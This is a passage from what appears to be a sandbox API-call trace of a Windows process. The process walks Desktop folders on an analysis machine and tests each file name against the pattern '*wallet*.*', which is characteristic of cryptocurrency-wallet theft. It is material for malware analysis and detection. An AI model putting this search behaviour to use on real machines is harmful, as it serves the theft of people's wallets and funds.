lpMultiByteStr=0x29a2cd8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", lpUsedDefaultChar=0x0) returned 58 [0110.800] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a28e8 [0110.800] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2cd8 | out: hHeap=0x29a0000) returned 1 [0110.800] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.800] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c00 [0110.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x3970c00, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.801] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.801] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.801] PathMatchSpecW (pszFile="LlE7.doc", pszSpec="*wallet*.*") returned 0 [0110.801] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.801] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28e8 | out: hHeap=0x29a0000) returned 1 [0110.801] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4773fc0, ftCreationTime.dwHighDateTime=0x1d7ab51, ftLastAccessTime.dwLowDateTime=0xfbe70ad0, ftLastAccessTime.dwHighDateTime=0x1d7ab5d, ftLastWriteTime.dwLowDateTime=0xfbe70ad0, ftLastWriteTime.dwHighDateTime=0x1d7ab5d, nFileSizeHigh=0x0, nFileSizeLow=0x1566b, dwReserved0=0x0, dwReserved1=0x0, cFileName="s ICeshe.bmp", cAlternateFileName="SICESH~1.BMP")) returned 1 [0110.801] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.801] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.801] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.801] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.801] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.801] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.801] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.801] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2a50 [0110.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x29a2a50, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", lpUsedDefaultChar=0x0) returned 62 [0110.801] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d20 [0110.801] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0110.801] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.801] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970bc0 [0110.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x3970bc0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.801] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.801] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970bc0 | out: hHeap=0x29a0000) returned 1 [0110.801] PathMatchSpecW (pszFile="s ICeshe.bmp", pszSpec="*wallet*.*") returned 0 [0110.801] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706a0 | out: hHeap=0x29a0000) returned 1 [0110.801] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d20 | out: hHeap=0x29a0000) returned 1 [0110.801] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 1 [0110.801] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.802] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.802] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.802] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.802] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.802] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.802] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.802] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2cd8 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x29a2cd8, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", lpUsedDefaultChar=0x0) returned 59 [0110.802] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2bb8 [0110.802] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2cd8 | out: hHeap=0x29a0000) returned 1 [0110.802] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.802] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d00 [0110.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x3970d00, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.802] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.802] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.802] PathMatchSpecW (pszFile="sQpxS.csv", pszSpec="*wallet*.*") returned 0 [0110.802] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.802] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0110.802] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 0 [0110.802] FindClose (in: hFindFile=0x7435a0 | out: hFindFile=0x7435a0) returned 1 [0110.802] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.802] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea918 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x38ea918, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpUsedDefaultChar=0x0) returned 49 [0110.802] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2df8 [0110.803] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea918 | out: hHeap=0x29a0000) returned 1 [0110.803] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.803] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d80 [0110.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970d80, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.803] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.803] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d80 | out: hHeap=0x29a0000) returned 1 [0110.803] PathMatchSpecW (pszFile="UQEQQujqhNYM", pszSpec="*wallet*.*") returned 0 [0110.803] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.803] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0110.803] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 1 [0110.803] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.803] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.803] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.803] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.803] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.803] lstrcatW (in: lpString1="\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.803] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2=".") returned 1 [0110.803] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2="..") returned 1 [0110.803] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.803] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*" [0110.803] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743260 [0110.803] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.803] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.803] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\." [0110.804] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.804] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.804] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\.") returned="\\KTOu\\_5VgSE0-6jvrM\\." [0110.804] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.804] FindNextFileW (in: hFindFile=0x743260, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.804] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.804] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.804] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.." [0110.804] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.804] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.804] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\..") returned="\\KTOu\\_5VgSE0-6jvrM\\.." [0110.804] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.804] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.804] FindNextFileW (in: hFindFile=0x743260, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67bd380, ftCreationTime.dwHighDateTime=0x1d7ab0a, ftLastAccessTime.dwLowDateTime=0x1a731140, ftLastAccessTime.dwHighDateTime=0x1d7ad95, ftLastWriteTime.dwLowDateTime=0x1a731140, ftLastWriteTime.dwHighDateTime=0x1d7ad95, nFileSizeHigh=0x0, nFileSizeLow=0xa5ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="aQrMbJ6CFhwhf7PNnuMu.docx", cAlternateFileName="AQRMBJ~1.DOC")) returned 1 [0110.804] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.804] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.804] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.804] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.804] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.804] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.804] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04a0 [0110.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0110.804] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4c) returned 0x38eb080 [0110.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x38eb080, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", lpUsedDefaultChar=0x0) returned 76 [0110.804] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38ead10 [0110.804] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb080 | out: hHeap=0x29a0000) returned 1 [0110.804] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.805] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c40 [0110.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x3970c40, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.805] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.805] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c40 | out: hHeap=0x29a0000) returned 1 [0110.805] PathMatchSpecW (pszFile="aQrMbJ6CFhwhf7PNnuMu.docx", pszSpec="*wallet*.*") returned 0 [0110.805] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970678 | out: hHeap=0x29a0000) returned 1 [0110.805] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ead10 | out: hHeap=0x29a0000) returned 1 [0110.805] FindNextFileW (in: hFindFile=0x743260, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2615710, ftCreationTime.dwHighDateTime=0x1d7aff0, ftLastAccessTime.dwLowDateTime=0xec0a4a10, 